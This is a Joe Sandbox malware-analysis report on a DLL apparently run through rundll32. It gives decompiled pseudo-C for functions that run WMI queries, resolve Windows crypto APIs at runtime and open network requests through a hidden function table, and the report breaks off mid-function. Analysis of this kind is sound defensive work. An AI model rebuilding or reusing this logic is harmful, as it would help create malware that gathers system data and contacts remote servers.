Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd1ae92bcf80342cdd4ce101a03d61d7b050554caf2ba98792aacaa291ae89a
Instruction ID: ccdbadd7ba936380601ea3cbd651e1978539a031b4c4eed27f92f684b5335f8e
Opcode Fuzzy Hash: ddd1ae92bcf80342cdd4ce101a03d61d7b050554caf2ba98792aacaa291ae89a
Instruction Fuzzy Hash: 7B51D3B4E01228DFEB52CF68C9C0B99BBF0BB0E314F11816AE958E3311D335A9858F51

Uniqueness

Uniqueness Score: -1.00%

Function 02E4222E Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000003.2684224148.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_3_2e40000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e7cfee9437a444e8fc128acef361a85886a240b47ba43e2e0b88c7076991434
Instruction ID: a7249857a677be5b447184c13bbc259ff942ca9a1d293198781f728794b4e1b6
Opcode Fuzzy Hash: 8e7cfee9437a444e8fc128acef361a85886a240b47ba43e2e0b88c7076991434
Instruction Fuzzy Hash: FA41D8B5E94209DFCB54CF98E490AEDB7F1BB08318F949065EE05AB351DB30A980CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10015207 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915d649be514e69a95b989d83612c341975e5e95291d22175ae017ea06cd4cf2
Instruction ID: d0fa73270d71585e7083f40233a42da0893e9660e5d16aed493464a71ca59f01
Opcode Fuzzy Hash: 915d649be514e69a95b989d83612c341975e5e95291d22175ae017ea06cd4cf2
Instruction Fuzzy Hash: 8B2171367154128BD35CCF2CD8A6A69F3A5FB49210F85427ED51BCB682CB72E492CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 693417F4 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2710520774.0000000069341000.00000020.00000001.01000000.00000005.sdmp, Offset: 69340000, based on PE: true

Associated: 0000000F.00000002.2710490868.0000000069340000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710821250.0000000069373000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.0000000069374000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710845657.000000006937C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2710992016.000000006938D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711015348.000000006938E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711040226.0000000069390000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000F.00000002.2711185450.00000000693AB000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_69340000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0f6ec2e13ef26ba2937adaa2fbb4dad4a63932638b2fe3b5a50e18eaf2d7e57
Instruction ID: 858b549502c8a1020fa0d23666debce769d8150b6a17ffa186c74a4d37e00801
Opcode Fuzzy Hash: c0f6ec2e13ef26ba2937adaa2fbb4dad4a63932638b2fe3b5a50e18eaf2d7e57
Instruction Fuzzy Hash: 72110939E41A08CFDB44CF98C190A98BBF5FB2CB14F924095E855AB762D332ED90CB55

Uniqueness

Uniqueness Score: -1.00%

Function 100026E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fa959bf55afc4f8d49bc31b5d3d751fe6b1c2fbb56e6436ccdfb01f05ea325b
Instruction ID: 8c55d59481a20edac22beb63bcdc80e93f7f59946f39b981f18aa1c6f739a984
Opcode Fuzzy Hash: 5fa959bf55afc4f8d49bc31b5d3d751fe6b1c2fbb56e6436ccdfb01f05ea325b
Instruction Fuzzy Hash: 63F04F316183826AF349CB788806F0A32C6EB402E0F348279E158CB1EAEEA0DA419304

Uniqueness

Uniqueness Score: -1.00%

Function 1000DFB4 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DFB4(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D972(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10009525(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000953B( &_v60, 0xfffffffe);
					E1000DA26( &_v104);
					return _t320;
				}
				_t165 = E1000948D(_t255, 0x578);
				 *_t328 = 0x9c5;
				_v52 = _t165;
				_t166 = E1000948D(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E10009DC8(_t165);
				_v60 = _t322;
				E1000A291( &_v52);
				E1000A291( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E1000948D(_t255, 0xa70);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E1000A291( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000953B( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E10009C2B(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E10009C2B(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E100095B9(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10009525( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000953B(_t136, 0);
								E1000953B( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E10009C2B(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E1000948D(_t281, 0x10ee);
								 *_t329 = 0x6bc;
								_t217 = E1000948D(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10009525(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E1000A291( &_v92);
											E1000A291( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E1000B76A();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10009525(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E1000948D(_t283, 0x9cc);
										E1000B76A( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E1000A291( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E10009C2B(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DE98( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000953B( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x1000dfbd
0x1000dfc3
0x1000dfca
0x1000dfcd
0x1000dfd0
0x1000dfd5
0x1000dfd7
0x1000dfdc
0x1000e424
0x1000e424
0x1000dfe9
0x1000dfeb
0x1000dfee
0x1000dff1
0x1000e409
0x1000e40f
0x1000e419
0x00000000
0x1000e41e
0x1000dffc
0x1000e003
0x1000e00a
0x1000e00d
0x1000e012
0x1000e014
0x1000e017
0x1000e01a
0x1000e01b
0x1000e024
0x1000e02a
0x1000e02d
0x1000e036
0x1000e03b
0x1000e040
0x1000e057
0x1000e064
0x1000e067
0x1000e06e
0x1000e073
0x1000e07a
0x1000e07f
0x1000e086
0x1000e088
0x1000e094
0x1000e097
0x1000e099
0x1000e3f9
0x1000e3fa
0x1000e403
0x00000000
0x1000e403
0x1000e09f
0x1000e0a2
0x1000e0a5
0x1000e0a8
0x1000e0aa
0x1000e3c5
0x1000e3c8
0x1000e3cb
0x1000e3cd
0x1000e3ef
0x1000e3f4
0x1000e3cf
0x1000e3d2
0x1000e3dd
0x1000e3e4
0x1000e3e4
0x00000000
0x00000000
0x00000000
0x00000000
0x1000e0b0
0x1000e0b0
0x1000e0c2
0x1000e0c5
0x1000e0c7
0x00000000
0x00000000
0x1000e0cf
0x1000e0d2
0x1000e0d5
0x1000e0d8
0x1000e0db
0x1000e0de
0x00000000
0x00000000
0x1000e0e4
0x1000e0f2
0x1000e0f5
0x1000e0f7
0x1000e110
0x1000e11f
0x1000e127
0x1000e127
0x1000e12a
0x1000e131
0x1000e135
0x1000e13b
0x1000e13d
0x1000e3ad
0x1000e3b3
0x1000e3b9
0x1000e3bc
0x1000e3bc
0x00000000
0x1000e3bc
0x1000e14c
0x1000e160
0x1000e164
0x1000e166
0x1000e16b
0x1000e37a
0x1000e380
0x1000e38b
0x1000e396
0x1000e39c
0x1000e3a2
0x1000e3a5
0x00000000
0x1000e3a5
0x1000e171
0x1000e348
0x1000e348
0x1000e34b
0x1000e34e
0x00000000
0x00000000
0x1000e179
0x1000e181
0x1000e188
0x1000e18e
0x1000e190
0x00000000
0x00000000
0x1000e199
0x1000e1ae
0x1000e1b4
0x1000e1bd
0x1000e1c0
0x1000e1c3
0x1000e1c5
0x1000e33b
0x1000e33e
0x1000e347
0x1000e347
0x00000000
0x1000e347
0x1000e1d5
0x1000e1d8
0x1000e1df
0x1000e1e5
0x1000e1e8
0x1000e1eb
0x1000e1ee
0x1000e1f1
0x1000e22d
0x1000e22d
0x1000e230
0x1000e2dc
0x1000e2f0
0x1000e300
0x1000e304
0x1000e306
0x1000e31d
0x1000e321
0x1000e32a
0x1000e335
0x00000000
0x1000e335
0x1000e30c
0x1000e30d
0x1000e312
0x1000e312
0x1000e314
0x1000e315
0x1000e31a
0x00000000
0x1000e31a
0x1000e236
0x1000e236
0x1000e239
0x1000e2a4
0x1000e2b8
0x1000e2c8
0x1000e2cc
0x1000e2ce
0x00000000
0x00000000
0x1000e2d4
0x1000e2d5
0x00000000
0x1000e2d5
0x1000e23b
0x1000e23b
0x1000e23e
0x00000000
0x00000000
0x1000e240
0x1000e243
0x00000000
0x00000000
0x1000e245
0x1000e245
0x1000e24b
0x1000e267
0x1000e276
0x1000e27f
0x1000e284
0x1000e287
0x1000e28d
0x1000e28d
0x1000e292
0x1000e29e
0x00000000
0x1000e29e
0x1000e250
0x00000000
0x1000e250
0x1000e1f3
0x1000e21a
0x1000e21f
0x1000e224
0x1000e226
0x1000e226
0x00000000
0x1000e224
0x1000e1f5
0x1000e1f5
0x1000e1f8
0x00000000
0x00000000
0x1000e1fe
0x1000e1fe
0x1000e201
0x00000000
0x00000000
0x1000e207
0x1000e207
0x1000e20a
0x00000000
0x00000000
0x1000e210
0x1000e213
0x00000000
0x00000000
0x1000e215
0x00000000
0x1000e215
0x1000e357
0x1000e35d
0x1000e363
0x1000e366
0x1000e369
0x1000e369
0x1000e36c
0x1000e36d
0x1000e370
0x1000e372
0x00000000
0x00000000
0x1000e3c2
0x1000e3c2
0x00000000
0x1000e3c2
0x1000e0f9
0x1000e0ff
0x00000000
0x1000e0ff
0x1000e3bf
0x00000000
0x1000e042
0x1000e047
0x1000e04c
0x00000000
0x1000e050

APIs

Part of subcall function 1000D972: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D985
Part of subcall function 1000D972: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D996
Part of subcall function 1000D972: CoCreateInstance.OLE32(1001D928,00000000,00000001,1001D938,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9AD
Part of subcall function 1000D972: SysAllocString.OLEAUT32(00000000), ref: 1000D9B8
Part of subcall function 1000D972: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000DCA3,000010FB,00000000,00000000,00000005), ref: 1000D9E3

Part of subcall function 10009525: RtlAllocateHeap.E77242D6(00000008,?,?,1000990B,00000100,00000001,100010BC), ref: 10009533

SysAllocString.OLEAUT32(00000000), ref: 1000E05D
SysAllocString.OLEAUT32(00000000), ref: 1000E071
SysFreeString.OLEAUT32(?), ref: 1000E3FA
SysFreeString.OLEAUT32(?), ref: 1000E403

Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581

Strings

FALSE, xrefs: 1000E226
TRUE, xrefs: 1000E21F

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 1290676130-1412513891
Opcode ID: 1ca1a3504ed0376f267886d94587d7e8d7815c7b98ce9207ac68ce592b44425b
Instruction ID: 0fc0e3d576d83403318f50b99c476987941cb1918b05b8b85936d2293dab87e0
Opcode Fuzzy Hash: 1ca1a3504ed0376f267886d94587d7e8d7815c7b98ce9207ac68ce592b44425b
Instruction Fuzzy Hash: 44E17D75E00219AFEB05DFE4C885EAEBBB9FF49380F108159E505B7299DB31AE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013B62 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E10013B62(intOrPtr* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char _v16;
				_Unknown_base(*)()* _t15;
				void* _t20;
				intOrPtr* _t25;
				intOrPtr* _t29;
				struct HINSTANCE__* _t30;

				_v8 = _v8 & 0x00000000;
				_t30 = GetModuleHandleW(L"advapi32.dll");
				if(_t30 == 0) {
					L7:
					return 1;
				}
				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
				if(_t25 == 0) {
					goto L7;
				}
				_t15 = GetProcAddress(_t30, "CryptGenRandom");
				_v12 = _t15;
				if(_t15 == 0) {
					goto L7;
				}
				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
				if(_t29 == 0) {
					goto L7;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if( *_t25() == 0) {
					goto L7;
				}
				_t20 = _v12(_v8, 4,  &_v16);
				 *_t29(_v8, 0);
				if(_t20 == 0) {
					goto L7;
				}
				 *_a4 = E10013ABD( &_v16);
				return 0;
			}

0x10013b68
0x10013b7a
0x10013b7e
0x10013bf2
0x00000000
0x10013bf4
0x10013b8e
0x10013b92
0x00000000
0x00000000
0x10013b9a
0x10013b9c
0x10013ba1
0x00000000
0x00000000
0x10013bab
0x10013baf
0x00000000
0x00000000
0x10013bb1
0x10013bb6
0x10013bb8
0x10013bba
0x10013bbf
0x10013bc4
0x00000000
0x00000000
0x10013bcf
0x10013bd9
0x10013bdd
0x00000000
0x00000000
0x10013bec
0x00000000

APIs

GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,10008511), ref: 10013B74
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10013B8C
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 10013B9A
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 10013BA9

Strings

CryptReleaseContext, xrefs: 10013BA3
advapi32.dll, xrefs: 10013B6F
CryptAcquireContextA, xrefs: 10013B86
CryptGenRandom, xrefs: 10013B94

Memory Dump Source

Source File: 0000000F.00000002.2710231806.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000F.00000002.2710207572.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710384604.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710427976.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.2710458940.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: ea4d4a06ababf097d1f427d636e20c623771a99ae6d7e2ce5fcd8467c9237de7
Instruction ID: bcf02c9419d9941f1c28ba2f8d3f55f4af3997818ec7d333a51f7a575932be52
Opcode Fuzzy Hash: ea4d4a06ababf097d1f427d636e20c623771a99ae6d7e2ce5fcd8467c9237de7
Instruction Fuzzy Hash: 6711A53A90562AB7DB11DBA88C81F9EB7ECDF45750F118061FB00EF140EB70DE8546A4

Uniqueness

Uniqueness Score: -1.00%

Function 1000F919 Relevance: 13.8, APIs: 7, Strings: 2, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E1000F919(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v60;
				int _v72;
				void* _v76;
				intOrPtr _v96;
				int _v100;
				void* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				char* _v116;
				char _v120;
				char _v136;
				void _v396;
				void _v652;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t100;
				intOrPtr* _t102;
				intOrPtr _t107;
				signed int _t108;
				void* _t109;
				intOrPtr _t110;
				signed int _t111;
				intOrPtr _t113;
				char _t115;
				intOrPtr _t120;
				signed int _t122;
				intOrPtr _t128;
				intOrPtr _t132;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t140;
				char _t144;
				intOrPtr _t146;
				void* _t155;
				signed int _t157;
				void* _t161;
				intOrPtr _t167;
				intOrPtr _t172;
				signed int _t173;
				signed int _t182;
				char _t186;
				signed int _t187;
				void* _t188;
				signed int _t190;
				signed int _t191;
				char _t192;
				void* _t193;

				_v24 = __ecx;
				_v36 = 0;
				_v28 = 4;
				_v32 = 1;
				_t188 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v60 = E10009473(0x1232);
				_t89 = E10009473(0xd24);
				_t161 = 0x7d;
				_v56 = _t89;
				_v52 = E10009473(_t161);
				_v48 = E10009473(0x14e);
				_t92 = E10009473(0x580);
				_v40 = _v40 & 0;
				_t186 = 0x3c;
				_v44 = _t92;
				E100096BF( &_v120, 0, 0x100);
				_v112 = 0x10;
				_v116 =  &_v136;
				_v120 = _t186;
				_v104 =  &_v396;
				_v100 = 0x100;
				_v76 =  &_v652;
				_push( &_v120);
				_push(0);
				_v72 = 0x100;
				_push(E1000D389(_t188));
				_t100 =  *0x10020d70; // 0x0
				_push(_t188);
				if( *((intOrPtr*)(_t100 + 0x28))() != 0) {
					_t182 = 0;
					__eflags = 0;
					_v12 = 0;
					do {
						_t102 =  *0x10020d70; // 0x0
						_v8 = 0x8404f700;
						_t187 =  *_t102( *0x10020e88,  *((intOrPtr*)(_t193 + _t182 * 4 - 0x20)), 0, 0, 0);
						__eflags = _t187;
						if(_t187 != 0) {
							E1000F8B1(_t187);
							_t107 =  *0x10020d70; // 0x0
							_t108 =  *((intOrPtr*)(_t107 + 0x1c))(_t187,  &_v396, _v96, 0, 0, 3, 0, 0);
							__eflags = _a24;
							_t157 = _t108;
							if(_a24 != 0) {
								E1000B983(_a24);
							}
							__eflags = _t157;
							if(_t157 != 0) {
								__eflags = _v108 - 4;
								_t167 = 0x8484f700;
								if(_v108 != 4) {
									_t167 = _v8;
								}
								__eflags = _v24 - 2;
								_t109 = 0x1001e01c;
								if(_v24 != 2) {
									_t109 = 0x1001e024;
								}
								_t110 =  *0x10020d70; // 0x0
								_t111 =  *((intOrPtr*)(_t110 + 0x20))(_t157, _t109,  &_v652, 0, 0,  &_v60, _t167, 0);
								__eflags = _a24;
								_t190 = _t111;
								_v8 = _t190;
								if(_a24 != 0) {
									E1000B983(_a24);
								}
								__eflags = _t190;
								if(_t190 != 0) {
									__eflags = _v108 - 4;
									if(_v108 == 4) {
										E1000F85F(_t190);
									}
									__eflags = _v24 - 2;
									if(_v24 != 2) {
										__eflags = 0;
										_t113 =  *0x10020d70; // 0x0
										_v8 =  *((intOrPtr*)(_t113 + 0x24))(_t190, 0, 0, 0, 0);
									} else {
										_t144 = E10009473(0xfe2);
										_t192 = _t144;
										_v16 = _t192;
										_t146 =  *0x10020d70; // 0x0
										_t190 = _v8;
										_v8 =  *((intOrPtr*)(_t146 + 0x24))(_t190, _t192, E1000D389(_t192), _a4, _a8);
										E1000A27E( &_v16);
									}
									__eflags = _a24;
									if(_a24 != 0) {
										E1000B983(_a24);
									}
									__eflags = _v8;
									if(_v8 != 0) {
										L31:
										_t115 = 8;
										_v28 = _t115;
										_v20 = 0;
										_v16 = 0;
										E100096BF( &_v20, 0, _t115);
										_t120 =  *0x10020d70; // 0x0
										__eflags =  *((intOrPtr*)(_t120 + 0xc))(_t190, 0x13,  &_v20,  &_v28, 0);
